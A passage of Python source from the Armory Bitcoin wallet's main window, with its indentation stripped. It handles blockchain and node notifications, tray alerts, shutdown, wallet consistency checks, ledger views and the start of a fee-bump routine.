tt = tt + self.tr('Last block received %1 ago').arg(secondsToHumanTime(blkRecvAgo))
return tt
self.lblArmoryStatus.setToolTipLambda(getToolTipTextOnline)
elif self.nodeStatus.status_ == Cpp.NodeStatus_Offline:
self.lblArmoryStatus.setText(\
self.tr('<font color=%1><b>Node offline (%2 blocks)</b></font> ').arg(\
htmlColor('TextRed')).arg(TheBDM.getTopBlockHeight()))
def getToolTipTextOffline():
blkRecvAgo = RightNow() - self.blkReceived
tt = self.tr(
'Disconnected from Bitcoin Node, cannot update history '
'<br><br>Last known block: %1 <br>Received %2 ago').arg(TheBDM.getTopBlockHeight()).arg(secondsToHumanTime(blkRecvAgo))
return tt
self.lblArmoryStatus.setToolTipLambda(getToolTipTextOffline)
#############################################################################
def handleCppNotification(self, action, args):
if action == FINISH_LOAD_BLOCKCHAIN_ACTION:
#Blockchain just finished loading, finish initializing UI and render the
#ledgers
self.nodeStatus = TheBDM.bdv().getNodeStatus()
TheBDM.setWitness(self.nodeStatus.SegWitEnabled_)
try:
self.updateWalletData()
except Exception as e:
LOGERROR("Failed update wallet data with error: %s" % e)
return
for wltid in self.walletMap:
self.walletMap[wltid].detectHighestUsedIndex()
self.blkReceived = RightNow()
if self.needUpdateAfterScan:
LOGDEBUG('Running finishLoadBlockchain')
self.finishLoadBlockchainGUI()
self.needUpdateAfterScan = False
self.setDashboardDetails()
self.updateStatusBarText()
elif action == NEW_ZC_ACTION and not CLI_OPTIONS.ignoreZC:
#A zero conf Tx conerns one of the address Armory is tracking, pull the
#updated ledgers from the BDM and create the related notifications.
try:
self.updateWalletData()
except Exception as e:
LOGERROR("Failed update wallet data with error: %s" % e)
return
self.notifyNewZeroConf(args)
self.createCombinedLedger()
elif action == NEW_BLOCK_ACTION:
#A new block has appeared, pull updated ledgers from the BDM, display
#the new block height in the status bar and note the block received time
try:
self.updateWalletData()
except Exception as e:
LOGERROR("Failed update wallet data with error: %s" % e)
return
newBlocks = args[0]
if newBlocks>0:
print 'New Block: ', TheBDM.getTopBlockHeight()
self.ledgerModel.reset()
LOGINFO('New Block! : %d', TheBDM.getTopBlockHeight())
self.createCombinedLedger()
self.blkReceived = RightNow()
self.writeSetting('LastBlkRecvTime', self.blkReceived)
self.writeSetting('LastBlkRecv', TheBDM.getTopBlockHeight())
if self.netMode==NETWORKMODE.Full:
LOGINFO('Current block number: %d', TheBDM.getTopBlockHeight())
# Update the wallet view to immediately reflect new balances
self.walletModel.reset()
self.updateStatusBarText()
elif action == REFRESH_ACTION:
#The wallet ledgers have been updated from an event outside of new ZC
#or new blocks (usually a wallet or address was imported, or the
#wallet filter was modified)
try:
self.updateWalletData()
except Exception as e:
LOGERROR("Failed update wallet data with error: %s" % e)
return
reset = False
if len(args) == 0:
self.createCombinedLedger()
return
for wltID in args:
if len(wltID) > 0:
if wltID in self.walletMap:
wlt = self.walletMap[wltID]
wlt.isEnabled = True
self.walletModel.reset()
wlt.doAfterScan()
self.changeWltFilter()
if wltID in self.oneTimeScanAction:
postScanAction = self.oneTimeScanAction[wltID]
del self.oneTimeScanAction[wltID]
if callable(postScanAction):
postScanAction()
elif wltID in self.lockboxIDMap:
lbID = self.lockboxIDMap[wltID]
self.allLockboxes[lbID].isEnabled = True
if self.lbDialogModel != None:
self.lbDialogModel.reset()
if self.lbDialog != None:
self.lbDialog.changeLBFilter()
elif wltID == "wallet_filter_changed":
reset = True
if self.walletSideScanProgress.has_key(wltID):
del self.walletSideScanProgress[wltID]
self.createCombinedLedger(reset)
elif action == WARNING_ACTION:
#something went wrong on the C++ side, create a message box to report
#it to the user
if 'rescan' in args[0].lower() or 'rebuild' in args[0].lower():
result = MsgBoxWithDNAA(self, self, MSGBOX.Critical, self.tr('BDM error!'), args[0],
self.tr("Rebuild and rescan on next start"), dnaaStartChk=False)
if result[1] == True:
touchFile( os.path.join(ARMORY_HOME_DIR, 'rebuild.flag') )
elif 'factory reset' in args[0].lower():
result = MsgBoxWithDNAA(self, self, MSGBOX.Critical, self.tr('BDM error!'), args[0],
self.tr("Factory reset on next start"), dnaaStartChk=False)
if result[1] == True:
DlgFactoryReset(self, self).exec_()
else:
QMessageBox.critical(self, self.tr('BlockDataManager Warning'), \
args[0], \
QMessageBox.Ok)
#this is a critical error reporting channel, should kill the app right
#after
os._exit(0)
elif action == SCAN_ACTION:
wltIDList = args[0]
prog = args[1]
hasWallet = False
hasLockbox = False
for wltID in wltIDList:
self.walletSideScanProgress[wltID] = prog*100
if len(wltID) > 0:
if wltID in self.walletMap:
wlt = self.walletMap[wltID]
wlt.disableWalletUI()
if wltID in self.walletDialogDict:
self.walletDialogDict[wltID].reject()
del self.walletDialogDict[wltID]
hasWallet = True
else:
lbID = self.lockboxIDMap[wltID]
self.allLockboxes[lbID].isEnabled = False
hasLockbox = True
self.walletModel.reset()
if hasWallet:
self.changeWltFilter()
if hasLockbox:
if self.lbDialogModel != None:
self.lbDialogModel.reset()
if self.lbDialog != None:
self.lbDialog.resetLBSelection()
self.lbDialog.changeLBFilter()
elif action == NODESTATUS_UPDATE:
prevStatus = None
if self.nodeStatus != None:
prevStatus = self.nodeStatus.status_
self.nodeStatus = args[0]
TheSDM.updateState(self.nodeStatus)
if prevStatus != self.nodeStatus.status_:
TheBDM.setWitness(self.nodeStatus.SegWitEnabled_)
if self.nodeStatus.status_ == Cpp.NodeStatus_Offline:
self.showTrayMsg(self.tr('Disconnected'), self.tr('Connection to Bitcoin Core '
'client lost! Armory cannot send nor '
'receive bitcoins until connection is '
're-established.'), QSystemTrayIcon.Critical,
10000)
elif self.nodeStatus.status_ == Cpp.NodeStatus_Online:
self.showTrayMsg(self.tr('Connected'), self.tr('Connection to Bitcoin Core '
're-established'), \
QSystemTrayIcon.Information, 10000)
self.updateStatusBarText()
self.updateSyncProgress()
elif action == BDM_SCAN_PROGRESS:
self.setDashboardDetails()
self.updateSyncProgress()
elif action == BDV_ERROR:
errorStruct = args[0]
if errorStruct.errType_ == Cpp.Error_ZC:
errorMsg = errorStruct.errorStr_
txHash = errorStruct.extraMsg_
self.zcBroadcastError(txHash, errorMsg)
#############################################################################
def Heartbeat(self, nextBeatSec=1):
"""
This method is invoked when the app is initialized, and will
run every second, or whatever is specified in the nextBeatSec
argument.
"""
# Special heartbeat functions are for special windows that may need
# to update every, say, every 0.1s
# is all that matters at that moment, like a download progress window.
# This is "special" because you are putting all other processing on
# hold while this special window is active
# IMPORTANT: Make sure that the special heartbeat function returns
# a value below zero when it's done OR if it errors out!
# Otherwise, it should return the next heartbeat delay,
# which would probably be something like 0.1 for a rapidly
# updating progress counter
for fn in self.extraHeartbeatSpecial:
try:
nextBeat = fn()
if nextBeat>0:
reactor.callLater(nextBeat, self.Heartbeat)
else:
self.extraHeartbeatSpecial = []
reactor.callLater(1, self.Heartbeat)
except:
LOGEXCEPT('Error in special heartbeat function')
self.extraHeartbeatSpecial = []
reactor.callLater(1, self.Heartbeat)
return
if TheBDM.exception != "":
QMessageBox.warning(self, self.tr('Database Error'), self.tr(
'The DB has returned the following error: <br><br> '
'<b> %1 </b> <br><br> Armory will now shutdown.').arg(TheBDM.exception), QMessageBox.Ok)
self.closeForReal()
# SatoshiDaemonManager
# BlockDataManager
sdmState = TheSDM.getSDMState()
bdmState = TheBDM.getState()
self.heartbeatCount += 1
try:
for func in self.extraHeartbeatAlways:
if isinstance(func, list):
fnc = func[0]
kargs = func[1]
keep_running = func[2]
if keep_running == False:
self.extraHeartbeatAlways.remove(func)
fnc(*kargs)
else:
func()
if self.doAutoBitcoind:
if (sdmState in ['BitcoindInitializing','BitcoindSynchronizing']) or \
(sdmState == 'BitcoindReady' and bdmState==BDM_SCANNING):
self.updateSyncProgress()
else:
if bdmState in (BDM_OFFLINE,BDM_UNINITIALIZED):
# This call seems out of place, but it's because if you are in offline
# mode, it needs to check periodically for the existence of Bitcoin Core
# so that it can enable the "Go Online" button
self.setDashboardDetails()
return
elif bdmState==BDM_SCANNING: # TODO - Move to handle cpp notification
self.updateSyncProgress()
if self.netMode==NETWORKMODE.Disconnected:
if self.isOnlineModePossible():
self.switchNetworkMode(NETWORKMODE.Full)
if bdmState==BDM_BLOCKCHAIN_READY:
# Trigger any notifications, if we have them... TODO - Remove add to new block, and block chain ready
self.doTheSystemTrayThing()
# Any extra functions that may have been injected to be run TODO - Call on New block
# when new blocks are received.
if len(self.extraNewBlockFunctions) > 0:
cppHead = TheBDM.getMainBlockFromDB(self.currBlockNum)
pyBlock = PyBlock().unserialize(cppHead.getSerializedBlock())
for blockFunc in self.extraNewBlockFunctions:
blockFunc(pyBlock)
# TODO - remove
for func in self.extraHeartbeatOnline:
func()
except:
# When getting the error info, don't collect the traceback in order to
# avoid circular references. https://docs.python.org/2/library/sys.html
# has more info.
LOGEXCEPT('Error in heartbeat function')
(errType, errVal) = sys.exc_info()[:2]
errStr = 'Error Type: %s\nError Value: %s' % (errType, errVal)
LOGERROR(errStr)
finally:
reactor.callLater(nextBeatSec, self.Heartbeat)
#############################################################################
def printAlert(self, moneyID, ledgerAmt, txAmt):
'''
Function that prints a notification for a transaction that affects an
address we control.
'''
dispLines = QStringList()
title = ''
totalStr = coin2strNZS(txAmt)
if moneyID in self.walletMap:
wlt = self.walletMap[moneyID]
if len(wlt.labelName) <= 20:
dispName = '"%(name)s"' % { 'name' : wlt.labelName }
else:
dispName = '"%(shortname)s..."' % { 'shortname' : wlt.labelName[:17] }
dispName = self.tr('Wallet %1 (%2)').arg(dispName, wlt.uniqueIDB58)
elif moneyID in self.cppLockboxWltMap:
lbox = self.getLockboxByID(moneyID)
if len(lbox.shortName) <= 20:
dispName = '%(M)d-of-%(N)d "%(shortname)s"' % { 'M' : lbox.M, 'N' : lbox.N, 'shortname' : lbox.shortName}
else:
dispName = ('%(M)d-of-%(N)d "%(shortname)s..."') % {'M' : lbox.M, 'N' : lbox.N, 'shortname' : lbox.shortName[:17] }
dispName = self.tr('Lockbox %1 (%2)').arg(dispName, lbox.uniqueIDB58)
else:
LOGERROR('Asked to show notification for wlt/lbox we do not have')
return
# Collected everything we need to display, now construct it and do it.
if ledgerAmt > 0:
# Received!
title = self.tr('Bitcoins Received!')
dispLines.append(self.tr('Amount: %1 BTC').arg(totalStr ))
dispLines.append(self.tr('Recipient: %1').arg(dispName))
elif ledgerAmt < 0:
# Sent!
title = self.tr('Bitcoins Sent!')
dispLines.append(self.tr('Amount: %1 BTC').arg(totalStr))
dispLines.append(self.tr('Sender: %1').arg(dispName))
self.showTrayMsg(title, dispLines.join('\n'), \
QSystemTrayIcon.Information, 10000)
LOGINFO(title)
#############################################################################
def doTheSystemTrayThing(self):
"""
I named this method as it is because this is not just "show a message."
I need to display all relevant transactions, in sequence that they were
received. I will store them in self.notifyQueue, and this method will
do nothing if it's empty.
"""
if not TheBDM.getState()==BDM_BLOCKCHAIN_READY or \
RightNow()<self.notifyBlockedUntil:
return
# Notify queue input is: [WltID/LBID, LedgerEntry, alreadyNotified]
for i in range(len(self.notifyQueue)):
moneyID, le, alreadyNotified = self.notifyQueue[i]
# Skip the ones we've notified of already.
if alreadyNotified:
continue
# Marke it alreadyNotified=True
self.notifyQueue[i][2] = True
# Catch condition that somehow the tx isn't related to us
if le.getTxHash()=='\x00'*32:
continue
# Make sure the wallet ID or lockbox ID keys are actually valid before
# using them to grab the appropriate C++ wallet.
pywlt = self.walletMap.get(moneyID)
lbox = self.getLockboxByID(moneyID)
# If we couldn't find a matching wallet or lbox, bail
if pywlt is None and lbox is None:
LOGERROR('Could not find moneyID = %s; skipping notify' % moneyID)
continue
if pywlt:
wname = self.walletMap[moneyID].labelName
if len(wname)>20:
wname = wname[:17] + '...'
wltName = self.tr('Wallet "%1" (%2)').arg(wname, moneyID)
else:
lbox = self.getLockboxByID(moneyID)
M = self.getLockboxByID(moneyID).M
N = self.getLockboxByID(moneyID).N
lname = self.getLockboxByID(moneyID).shortName
if len(lname) > 20:
lname = lname[:17] + '...'
wltName = self.tr('Lockbox %1-of-%2 "%3" (%4)').arg(M).arg(N).arg(lname, moneyID)
if le.isSentToSelf():
# Used to display the sent-to-self amount, but if this is a lockbox
# we only have a cppWallet, and the determineSentToSelfAmt() func
# only operates on python wallets. Oh well, the user can double-
# click on the tx in their ledger if they want to see what's in it.
# amt = determineSentToSelfAmt(le, cppWlt)[0]
# self.showTrayMsg('Your bitcoins just did a lap!', \
# 'Wallet "%s" (%s) just sent %s BTC to itself!' % \
# (wlt.labelName, moneyID, coin2str(amt,maxZeros=1).strip()),
self.showTrayMsg(self.tr('Your bitcoins just did a lap!'), \
self.tr('%1 just sent some BTC to itself!').arg(wltName), \
QSystemTrayIcon.Information, 10000)
return
# If coins were either received or sent from the loaded wlt/lbox
dispLines = QStringList()
totalStr = coin2strNZS(abs(le.getValue()))
title = None
if le.getValue() > 0:
title = self.tr('Bitcoins Received!')
dispLines.append(self.tr('Amount: %1 BTC').arg(totalStr))
dispLines.append(self.tr('From: %2').arg(wltName))
elif le.getValue() < 0:
try:
recipStr = ''
for addr in le.getScrAddrList():
if pywlt.hasScrAddr(addr):
continue
if len(recipStr)==0:
recipStr = scrAddr_to_addrStr(addr)
else:
recipStr = self.tr('<Multiple Recipients>')
title = self.tr('Bitcoins Sent!')
dispLines.append(unicode(self.tr('Amount: %1 BTC').arg(totalStr)))
dispLines.append(unicode(self.tr('From: %1').arg(wltName )))
dispLines.append(unicode(self.tr('To: %1').arg(recipStr)))
except Exception as e:
LOGERROR('tx broadcast systray display failed with error: %s' % e)
if title:
self.showTrayMsg(title, dispLines.join("\n"), \
QSystemTrayIcon.Information, 10000)
LOGINFO(title + '\n' + dispLines.join("\n"))
# Wait for 5 seconds before processing the next queue object.
self.notifyBlockedUntil = RightNow() + 5
return
#############################################################################
def closeEvent(self, event=None):
moc = self.getSettingOrSetDefault('MinimizeOrClose', 'DontKnow')
doClose, doMinimize = False, False
if moc=='DontKnow':
reply,remember = MsgBoxWithDNAA(self, self, MSGBOX.Question, self.tr('Minimize or Close'), \
self.tr('Would you like to minimize Armory to the system tray instead '
'of closing it?'), dnaaMsg=self.tr('Remember my answer'), \
yesStr=self.tr('Minimize'), noStr=self.tr('Close'))
if reply==True:
doMinimize = True
if remember:
self.writeSetting('MinimizeOrClose', 'Minimize')
else:
doClose = True;
if remember:
self.writeSetting('MinimizeOrClose', 'Close')
if doMinimize or moc=='Minimize':
self.minimizeArmory()
if event:
event.ignore()
elif doClose or moc=='Close':
self.doShutdown = True
self.sysTray.hide()
self.closeForReal()
event.ignore()
else:
return # how would we get here?
#############################################################################
def unpackLinuxTarGz(self, targzFile, changeSettings=True):
if targzFile is None:
return None
if not os.path.exists(targzFile):
return None
unpackDir = os.path.join(ARMORY_HOME_DIR, 'latestBitcoinInst')
unpackDir2 = os.path.join(ARMORY_HOME_DIR, 'latestBitcoinInstOld')
if os.path.exists(unpackDir):
if os.path.exists(unpackDir2):
shutil.rmtree(unpackDir2)
shutil.move(unpackDir, unpackDir2)
os.mkdir(unpackDir)
out,err = execAndWait('tar -zxf %s -C %s' % (targzFile, unpackDir), \
timeout=5)
LOGINFO('UNPACK STDOUT: "' + out + '"')
LOGINFO('UNPACK STDERR: "' + err + '"')
# There should only be one subdir
unpackDirChild = None
for fn in os.listdir(unpackDir):
unpackDirChild = os.path.join(unpackDir, fn)
if unpackDirChild is None:
LOGERROR('There was apparently an error unpacking the file')
return None
finalDir = os.path.abspath(unpackDirChild)
LOGWARN('Bitcoin Core unpacked into: %s', finalDir)
if changeSettings:
self.settings.set('SatoshiExe', finalDir)
return finalDir
#############################################################################
def closeForReal(self):
'''
Unlike File->Quit or clicking the X on the window, which may actually
minimize Armory, this method is for *really* closing Armory
'''
self.setCursor(Qt.WaitCursor)
self.showShuttingDownMessage()
try:
# Save the main window geometry in the settings file
try:
self.writeSetting('MainGeometry', str(self.saveGeometry().toHex()))
self.writeSetting('MainWalletCols', saveTableView(self.walletsView))
self.writeSetting('MainLedgerCols', saveTableView(self.ledgerView))
except:
pass
if TheBDM.getState()==BDM_SCANNING:
LOGINFO('BDM state is scanning -- force shutdown BDM')
else:
LOGINFO('BDM is safe for clean shutdown')
TheSDM.stopBitcoind()
TheBDM.shutdown()
# Remove Temp Modules Directory if it exists:
if self.tempModulesDirName:
shutil.rmtree(self.tempModulesDirName)
except:
# Don't want a strange error here interrupt shutdown
LOGEXCEPT('Strange error during shutdown')
LOGINFO('Attempting to close the main window!')
self.signalExecution.executeMethod(QAPP.quit)
#############################################################################
def execTrigger(self, toSpawn):
super(ArmoryDialog, toSpawn).exec_()
#############################################################################
def initTrigger(self, toInit):
if isinstance(toInit, DlgProgress):
toInit.setup(self)
toInit.status = 1
#############################################################################
def checkForNegImports(self):
negativeImports = []
for wlt in self.walletMap:
if self.walletMap[wlt].hasNegativeImports:
negativeImports.append(self.walletMap[wlt].uniqueIDB58)
# If we detect any negative import
if len(negativeImports) > 0:
logDirs = []
for wltID in negativeImports:
if not wltID in self.walletMap:
continue
homedir = os.path.dirname(self.walletMap[wltID].walletPath)
wltlogdir = os.path.join(homedir, wltID)
if not os.path.exists(wltlogdir):
continue
for subdirname in os.listdir(wltlogdir):
subdirpath = os.path.join(wltlogdir, subdirname)
logDirs.append([wltID, subdirpath])
DlgInconsistentWltReport(self, self, logDirs).exec_()
#############################################################################
def getAllRecoveryLogDirs(self, wltIDList):
self.logDirs = []
for wltID in wltIDList:
if not wltID in self.walletMap:
continue
homedir = os.path.dirname(self.walletMap[wltID].walletPath)
logdir = os.path.join(homedir, wltID)
if not os.path.exists(logdir):
continue
self.logDirs.append([wltID, logdir])
return self.logDirs
#############################################################################
@AllowAsync
def CheckWalletConsistency(self, wallets, prgAt=None):
if prgAt:
totalSize = 0
walletSize = {}
for wlt in wallets:
statinfo = os.stat(wallets[wlt].walletPath)
walletSize[wlt] = statinfo.st_size
totalSize = totalSize + statinfo.st_size
i=0
dlgrdy = [0]
nerrors = 0
for wlt in wallets:
if prgAt:
prgAt[0] = i
f = 10000*walletSize[wlt]/totalSize
prgAt[1] = f
i = f +i
self.wltCstStatus = WalletConsistencyCheck(wallets[wlt], prgAt)
if self.wltCstStatus[0] != 0:
self.WltCstError(wallets[wlt], self.wltCstStatus[1], dlgrdy)
while not dlgrdy[0]:
time.sleep(0.01)
nerrors = nerrors +1
prgAt[2] = 1
dlgrdy[0] = 0
while prgAt[2] != 2:
time.sleep(0.1)
if nerrors == 0:
self.emit(SIGNAL('UWCS'), [1, self.tr('All wallets are consistent'), 10000, dlgrdy])
self.emit(SIGNAL('checkForNegImports'))
else:
while not dlgrdy:
self.emit(SIGNAL('UWCS'), [1, self.tr('Consistency Check Failed!'), 0, dlgrdy])
time.sleep(1)
self.checkRdyForFix()
def checkRdyForFix(self):
#check BDM first
time.sleep(1)
self.dlgCptWlt.emit(SIGNAL('Show'))
while 1:
if TheBDM.getState() == BDM_SCANNING:
canFix = self.tr(
'The wallet analysis tool will become available '
'as soon as Armory is done loading. You can close this '
'window and it will reappear when ready.')
self.dlgCptWlt.UpdateCanFix([canFix])
time.sleep(1)
elif TheBDM.getState() == BDM_OFFLINE or \
TheBDM.getState() == BDM_UNINITIALIZED:
TheSDM.setDisabled(True)
CLI_OPTIONS.offline = True
break
else:
break
#check running dialogs
self.dlgCptWlt.emit(SIGNAL('Show'))
runningList = []
while 1:
listchanged = 0
canFix = []
for dlg in runningList:
if dlg not in runningDialogsList:
runningList.remove(dlg)
listchanged = 1
for dlg in runningDialogsList:
if not isinstance(dlg, DlgCorruptWallet):
if dlg not in runningList:
runningList.append(dlg)
listchanged = 1
if len(runningList):
if listchanged:
canFix.append(self.tr(
'<b>The following dialogs need closed before you can '
'run the wallet analysis tool:</b>'))
canFix.extend([str(myobj.windowTitle()) for myobj in runningList])
self.dlgCptWlt.UpdateCanFix(canFix)
time.sleep(0.2)
else:
break
canFix.append('Ready to analyze inconsistent wallets!')
self.dlgCptWlt.UpdateCanFix(canFix, True)
self.dlgCptWlt.exec_()
def checkWallets(self):
nwallets = len(self.walletMap)
if nwallets > 0:
self.prgAt = [0, 0, 0]
self.pbarWalletProgress = QProgressBar()
self.pbarWalletProgress.setMaximum(10000)
self.pbarWalletProgress.setMaximumSize(300, 22)
self.pbarWalletProgress.setStyleSheet('text-align: center; margin-bottom: 2px; margin-left: 10px;')
self.pbarWalletProgress.setFormat(self.tr('Wallet Consistency Check: %p%'))
self.pbarWalletProgress.setValue(0)
self.statusBar().addWidget(self.pbarWalletProgress)
self.connect(self, SIGNAL('UWCS'), self.UpdateWalletConsistencyStatus)
self.connect(self, SIGNAL('PWCE'), self.PromptWltCstError)
self.CheckWalletConsistency(self.walletMap, self.prgAt, async=True)
self.UpdateConsistencyCheckMessage(async = True)
@AllowAsync
def UpdateConsistencyCheckMessage(self):
while self.prgAt[2] == 0:
self.emit(SIGNAL('UWCS'), [0, self.prgAt[0]])
time.sleep(0.5)
self.emit(SIGNAL('UWCS'), [2])
self.prgAt[2] = 2
def UpdateWalletConsistencyStatus(self, msg):
if msg[0] == 0:
self.pbarWalletProgress.setValue(msg[1])
elif msg[0] == 1:
self.statusBar().showMessage(msg[1], msg[2])
msg[3][0] = 1
else:
self.pbarWalletProgress.hide()
def WltCstError(self, wlt, status, dlgrdy):
self.emit(SIGNAL('PWCE'), dlgrdy, wlt, status)
LOGERROR('Wallet consistency check failed! (%s)', wlt.uniqueIDB58)
def PromptWltCstError(self, dlgrdy, wallet=None, status='', mode=None):
if not self.dlgCptWlt:
self.dlgCptWlt = DlgCorruptWallet(wallet, status, self, self)
dlgrdy[0] = 1
else:
self.dlgCptWlt.addStatus(wallet, status)
if not mode:
self.dlgCptWlt.show()
else:
self.dlgCptWlt.exec_()
#############################################################################
def loadNewPage(self):
pageInt = int(self.PageLineEdit.text())
if pageInt == self.mainLedgerCurrentPage:
return
if pageInt < 0 or pageInt > TheBDM.bdv().getWalletsPageCount():
self.PageLineEdit.setText(str(self.mainLedgerCurrentPage))
return
previousPage = self.mainLedgerCurrentPage
try:
self.mainLedgerCurrentPage = pageInt
self.createCombinedLedger()
except:
self.mainLedgerCurrentPage = previousPage
self.PageLineEdit.setText(str(self.mainLedgerCurrentPage))
#############################################################################
# System tray notifications require specific code for OS X. We'll handle
# messages here to hide the ugliness.
def showTrayMsg(self, dispTitle, dispText, dispIconType, dispTime):
if not OS_MACOSX:
self.sysTray.showMessage(dispTitle, dispText, dispIconType, dispTime)
else:
# Code supporting Growl (OSX 10.7) is buggy, and no one seems to care.
# Just jump straight to 10.8.
self.macNotifHdlr.showNotification(dispTitle, dispText)
#############################################################################
def bdv(self):
return TheBDM.bdv()
#############################################################################
def setupBDV(self):
if self.netMode == NETWORKMODE.Offline:
return
try:
TheBDM.registerBDV()
self.walletManager.setBDVObject(TheBDM.bdv())
except:
self.switchNetworkMode(NETWORKMODE.Offline)
return
for wltId in self.walletMap:
self.walletMap[wltId].registerWallet()
for lbObj in self.allLockboxes:
lbID = lbObj.uniqueIDB58
scrAddrList = lbObj.getScrAddrList()
self.cppLockboxWltMap[lbID] = lbObj.registerLockbox(scrAddrList, False)
#############################################################################
def startBlockchainProcessingInitialization(self):
self.startBitcoindIfNecessary()
self.completeBlockchainProcessingInitialization()
#############################################################################
def completeBlockchainProcessingInitialization(self):
if CLI_OPTIONS.offline:
return
gotDB = self.startArmoryDBIfNecessary()
if gotDB == False:
TheBDM.setState(BDM_OFFLINE)
self.switchNetworkMode(NETWORKMODE.Offline)
QMessageBox.warning(self, self.tr('Database Error'), self.tr(
'Armory failed to spawn the DB!<br> '
'Continuing operations in offline mode instead. <br> '
'Refer to the dbLog.txt for more information.'), QMessageBox.Ok)
self.setDashboardDetails()
return
else:
self.switchNetworkMode(NETWORKMODE.Full)
TheBDM.instantiateBDV(armoryengine.ArmoryUtils.ARMORYDB_PORT)
self.setupBDV()
self.setupLedgerViews()
self.loadBlockchainIfNecessary()
self.setDashboardDetails()
#############################################################################
def setupLedgerViews(self):
if self.netMode == NETWORKMODE.Offline:
return
# Table to display ledger/activity
w,h = tightSizeNChar(self.walletsView, 55)
viewWidth = 1.2*w
sectionSz = 1.3*h
viewHeight = 4.4*sectionSz
self.ledgerTable = []
self.ledgerModel = LedgerDispModelSimple(self.ledgerTable, self, self)
self.ledgerModel.setLedgerDelegate(TheBDM.bdv().getLedgerDelegateForWallets())
self.ledgerModel.setConvertLedgerMethod(self.convertLedgerToTable)
self.frmLedgUpDown = QFrame()
self.ledgerView = ArmoryTableView(self, self, self.frmLedgUpDown)
self.ledgerView.setModel(self.ledgerModel)
self.ledgerView.setSortingEnabled(True)
self.ledgerView.setItemDelegate(LedgerDispDelegate(self))
self.ledgerView.setSelectionBehavior(QTableView.SelectRows)
self.ledgerView.setSelectionMode(QTableView.SingleSelection)
self.ledgerView.verticalHeader().setDefaultSectionSize(sectionSz)
self.ledgerView.verticalHeader().hide()
self.ledgerView.horizontalHeader().setResizeMode(0, QHeaderView.Fixed)
self.ledgerView.horizontalHeader().setResizeMode(3, QHeaderView.Fixed)
self.ledgerView.hideColumn(LEDGERCOLS.isOther)
self.ledgerView.hideColumn(LEDGERCOLS.UnixTime)
self.ledgerView.hideColumn(LEDGERCOLS.WltID)
self.ledgerView.hideColumn(LEDGERCOLS.TxHash)
self.ledgerView.hideColumn(LEDGERCOLS.isCoinbase)
self.ledgerView.hideColumn(LEDGERCOLS.toSelf)
self.ledgerView.hideColumn(LEDGERCOLS.optInRBF)
# Another table and model, for lockboxes
self.currentLBPage = 0
self.lockboxLedgTable = []
self.lockboxLedgModel = LedgerDispModelSimple(self.lockboxLedgTable,
self, self, isLboxModel=True)
self.lockboxLedgModel.setLedgerDelegate(TheBDM.bdv().getLedgerDelegateForLockboxes())
self.lockboxLedgModel.setConvertLedgerMethod(self.convertLedgerToTable)
self.lbDialogModel = None
dateWidth = tightSizeStr(self.ledgerView, '_9999-Dec-99 99:99pm__')[0]
cWidth = 20 # num-confirm icon width
tWidth = 72 # date icon width
initialColResize(self.ledgerView, [cWidth, 0, dateWidth, tWidth, 0.30, 0.40, 0.3])
self.connect(self.ledgerView, SIGNAL('doubleClicked(QModelIndex)'), \
self.dblClickLedger)
self.ledgerView.setContextMenuPolicy(Qt.CustomContextMenu)
self.ledgerView.customContextMenuRequested.connect(self.showContextMenuLedger)
self.connect(self.ledgerView.horizontalHeader(), \
SIGNAL('sortIndicatorChanged(int,Qt::SortOrder)'), \
self.changeLedgerSorting)
#page selection UI
self.mainLedgerCurrentPage = 1
self.lblPages = QRichLabel('Page: ')
self.PageLineEdit = QLineEdit('1')
self.lblNPages = QRichLabel(' out of 1')
self.connect(self.PageLineEdit, SIGNAL('editingFinished()'), \
self.loadNewPage)
self.changeWltFilter()
# Will fill this in when ledgers are created & combined
self.lblLedgShowing = QRichLabel('Showing:', hAlign=Qt.AlignHCenter)
self.lblLedgRange = QRichLabel('', hAlign=Qt.AlignHCenter)
self.lblLedgTotal = QRichLabel('', hAlign=Qt.AlignHCenter)
self.comboNumShow = QComboBox()
for s in self.numShowOpts:
self.comboNumShow.addItem( str(s) )
self.comboNumShow.setCurrentIndex(0)
self.comboNumShow.setMaximumWidth( tightSizeStr(self, '_9999_')[0]+25 )
self.btnLedgUp = QLabelButton('')
self.btnLedgUp.setMaximumHeight(20)
self.btnLedgUp.setPixmap(QPixmap(':/scroll_up_18.png'))
self.btnLedgUp.setAlignment(Qt.AlignVCenter | Qt.AlignHCenter)
self.btnLedgUp.setVisible(False)
self.btnLedgDn = QLabelButton('')
self.btnLedgDn.setMaximumHeight(20)
self.btnLedgDn.setPixmap(QPixmap(':/scroll_down_18.png'))
self.btnLedgDn.setAlignment(Qt.AlignVCenter | Qt.AlignHCenter)
self.connect(self.comboNumShow, SIGNAL('activated(int)'), self.changeNumShow)
self.connect(self.btnLedgUp, SIGNAL('clicked()'), self.clickLedgUp)
self.connect(self.btnLedgDn, SIGNAL('clicked()'), self.clickLedgDn)
frmFilter = makeVertFrame([QLabel(self.tr('Filter:')), self.comboWltSelect, 'Stretch'])
frmLower = makeHorizFrame([ frmFilter, \
'Stretch', \
self.frmLedgUpDown, \
'Stretch', \
self.frmTotals])
# Now add the ledger to the bottom of the window
ledgLayout = QGridLayout()
ledgLayout.addWidget(self.ledgerView, 1,0)
ledgLayout.addWidget(frmLower, 2,0)
ledgLayout.setRowStretch(0, 0)
ledgLayout.setRowStretch(1, 1)
ledgLayout.setRowStretch(2, 0)
self.tabActivity = QWidget()
self.tabActivity.setLayout(ledgLayout)
self.mainDisplayTabs.addTab(self.tabActivity, self.tr('Transactions'))
hexledgsz = self.settings.get('MainLedgerCols')
if len(hexledgsz)>0:
restoreTableView(self.ledgerView, hexledgsz)
self.ledgerView.setColumnWidth(LEDGERCOLS.NumConf, 20)
self.ledgerView.setColumnWidth(LEDGERCOLS.TxDir, 72)
#############################################################################
def bumpFee(self, walletId, txHash):
#grab wallet
wlt = self.walletMap[walletId]
#grab ZC from DB
zctx = TheBDM.bdv().getTxByHash(txHash)
pytx = PyTx().unserialize(zctx.serialize())
#create tx batch
batch = Cpp.TransactionBatch()
for txin in pytx.inputs:
outpoint = txin.outpoint
batch.addSpender(binary_to_hex(outpoint.txHash), \
outpoint.txOutIndex, txin.intSeq)
for txout in pytx.outputs:
script = txout.getScript()
scrAddr = BtcUtils().getScrAddrForScript(script)
addrComment = wlt.getCommentForAddress(scrAddr)
b58Addr = scrAddr_to_addrStr(scrAddr)
if addrComment == CHANGE_ADDR_DESCR_STRING:
#change address
batch.setChange(b58Addr)
else:
#recipient
batch.addRecipient(b58Addr, txout.value)
batch.setWalletID(walletId)
#feed batch to spend dlg
batchStr = batch.serialize()
dlgSpend = DlgSendBitcoins(None, self, self)
